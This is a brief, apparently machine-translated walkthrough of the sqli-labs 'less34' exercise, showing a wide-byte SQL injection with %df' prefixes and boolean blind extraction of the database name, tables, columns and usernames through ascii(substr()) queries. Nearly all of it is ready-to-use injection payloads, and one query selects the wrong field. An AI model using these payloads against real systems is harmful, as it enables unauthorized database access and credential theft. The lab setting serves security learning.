SQL injection less34 (post wide byte injection + Boolean blind injection)

Pre knowledge ：【Try to Hack】 Wide byte Injection

Try the universal password
' or 1#

It's escaped , Use wide byte injection
%df' or 1#

Found no effect , also %df It's directly displayed （ It didn't show up before , It is a figure of a question mark ）
Grab the bag , Right % the URL code
1%25df%27+or+1%23

We use it burp Just inject wide bytes
%df' or 1#

%df' or length(database())=8#

%df' or ascii(substr(database(),1,1))=115#

%df' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#

%df' or ascii(substr((select column_name from information _schema.columns where table_name="users" limit 0,1),1,1))=105#

because "users" Quotation marks are used , Use subqueries or 16 Hexadecimal way ( Hex succeeded , But subquery , There is something wrong )
%df' or ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))=105#

%df' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=(select table_schema from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)),1,1))=105#

%df' or ascii(substr((select username from users limit 0,1), 1,1))=68#